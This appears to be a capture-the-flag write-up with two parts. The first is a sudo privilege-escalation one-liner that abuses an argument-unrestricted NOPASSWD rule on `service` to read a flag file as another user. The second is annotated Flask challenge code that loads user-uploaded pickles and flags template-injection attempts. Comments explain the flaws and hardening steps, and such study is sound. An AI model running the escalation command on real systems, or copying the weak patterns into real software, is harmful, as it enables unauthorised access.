sudo -l
Matching Defaults entries for ciscn on 20c26fd45569:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User ciscn may run the following commands on 20c26fd45569:
    (dragon_lord : dragon_lord) NOPASSWD: /home/dragon_lord/Wait_3_years
    (dragon_lord : dragon_lord) NOPASSWD: /usr/sbin/service
# Relies on the NOPASSWD rule for /usr/sbin/service shown in the `sudo -l`
# output: that rule names only the binary, so sudo accepts any arguments
# placed after it.
# The first argument is a relative path ending in bin/cat rather than a service
# name, and /flag.txt is passed along after it; everything runs as dragon_lord.
# NOTE(review): the "…" characters look like a typographic rendering of the
# path's dot segments -- confirm against the original post.
# Hardening: do not grant sudo on launcher-style commands such as service, or
# pin the complete argument list in sudoers (an exact service name and action).
cd /usr/bin && sudo -u dragon_lord /usr/sbin/service …/…/bin/cat /flag.txt
def find_class(self, module, name):
    """Resolve a global referenced by a pickle stream against an allow-list.

    Only ``__main__.webSite`` is accepted; any other ``module``/``name`` pair
    raises ``pickle.UnpicklingError``.

    This decides which global a pickle may reference and nothing more: it does
    not look at the attribute values the stream supplies for the resulting
    object, so callers still need to validate what they get back.

    NOTE(review): presumably the ``find_class`` override of
    ``RestrictedUnpickler``; the class header is not part of this listing.
    """
    permitted = module == "__main__" and name == 'webSite'
    if not permitted:
        # Deny by default: anything not explicitly allow-listed is rejected.
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
    return webSite
def restricted_loads(s):
    """Deserialize the bytes ``s`` the way ``pickle.loads()`` would.

    The data is wrapped in an in-memory stream and loaded through
    ``RestrictedUnpickler`` instead of the default unpickler. Exceptions raised
    while loading propagate to the caller.
    """
    stream = io.BytesIO(s)
    unpickler = RestrictedUnpickler(stream)
    return unpickler.load()
# Module-level state shared by the request handlers: the current site record,
# created with webSite's default arguments.
site = webSite()
@app.route('/')
def none():
    """Redirect the bare root URL to the index page."""
    return redirect('/index.php')


@app.route('/index.php')
def index():
    """Render the landing page from the global ``site`` record.

    When either ``site.name`` or ``site.describe`` contains both ``{`` and
    ``}``, the marker text is appended to both fields (once) and the "hit"
    image is shown; otherwise the default image is shown. Any exception in
    that path resets ``site`` to an ``Error`` record and renders that.

    The values are handed to ``render_template`` as context variables; how
    ``index.html`` outputs them is not visible in this listing.
    """
    global site
    marker = 'LOL, No SSTI'

    def has_braces(text):
        return "{" in text and "}" in text

    try:
        if has_braces(site.name) or has_braces(site.describe):
            if not (marker in site.name or marker in site.describe):
                site.name += marker
                site.describe += marker
            # NOTE(review): the collapsed listing does not show whether the
            # 'hit.gif' response sits inside the marker check or beside it;
            # it is placed at the outer level here -- confirm.
            img, hit = 'hit.gif', '1000'
        else:
            img, hit = 'waizui.png', '500'
        return render_template('index.html', name=site.name, des=site.describe, img=img, hit=hit)
    except Exception:
        # Also reached when site holds something without usable string
        # name/describe attributes, e.g. after an unexpected upload.
        site = webSite(name='Error', describe='Error')
        return render_template('index.html', name=site.name, des=site.describe, img='waizui.png', hit='500')


@app.route('/manage.php', methods=["GET", "POST"])
def manage():
    """Update the site record from query-string parameters and persist it.

    ``name`` and ``describe`` are read from ``request.args`` for GET and POST
    alike; empty or missing values leave the field unchanged. The record is
    then pickled to ``./data.pickle`` and the client is redirected to ``/``.

    NOTE(review): this handler changes state on a plain GET and contains no
    authentication or CSRF check of its own.
    """
    global site
    for field in ("name", 'describe'):
        supplied = request.args.get(field)
        if supplied:
            setattr(site, field, supplied)
    with open('./data.pickle', 'wb') as out:
        pickle.dump(site, out)
    return redirect('/')
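@app.route('/data.pickle')
def pull():
    """Serialize the current site record and return it as a download.

    The record is pickled to ``./data.pickle`` on every request and that file
    is then sent as an attachment.
    """
    with open('./data.pickle', 'wb') as out:
        pickle.dump(site, out)
    return send_from_directory('./', 'data.pickle', as_attachment=True)


@app.route('/push.php', methods=['POST'])
def push():
    """Replace the site record with one loaded from an uploaded pickle.

    Expects a multipart field named ``file``. Returns ``'No File!'`` when the
    field is absent and ``'no File Name!'`` when its filename is empty;
    otherwise redirects to ``/``. An upload that cannot be loaded, or that
    does not yield a ``webSite`` with string ``name``/``describe``, resets the
    record to an ``Error`` placeholder.
    """
    global site
    if 'file' not in request.files:
        return ('No File!')
    upload = request.files['file']
    if upload.filename == '':
        return 'no File Name!'

    # Read the upload in memory. Saving it under the client-supplied name in
    # the working directory let a request overwrite files there (including
    # data.pickle), and secure_filename() can return an empty name.
    payload = upload.read()

    # SECURITY: this is pickle data from an untrusted client. An earlier
    # byte-level filter on b'R' and a plain pickle.loads() call were replaced
    # by the restricted unpickler, which only limits which global may be
    # referenced.
    try:
        loaded = restricted_loads(payload)
    except Exception:
        # Malformed pickles raise more than UnpicklingError (EOFError,
        # AttributeError, IndexError, ...); treat all of them as a bad upload
        # instead of answering with a 500.
        loaded = None

    # The allow-list does not constrain the object's state, so check the type
    # and the fields the other handlers read before accepting it.
    if (isinstance(loaded, webSite)
            and isinstance(getattr(loaded, 'name', None), str)
            and isinstance(getattr(loaded, 'describe', None), str)):
        site = loaded
    else:
        site = webSite(name='Error', describe='Error')
    return redirect('/')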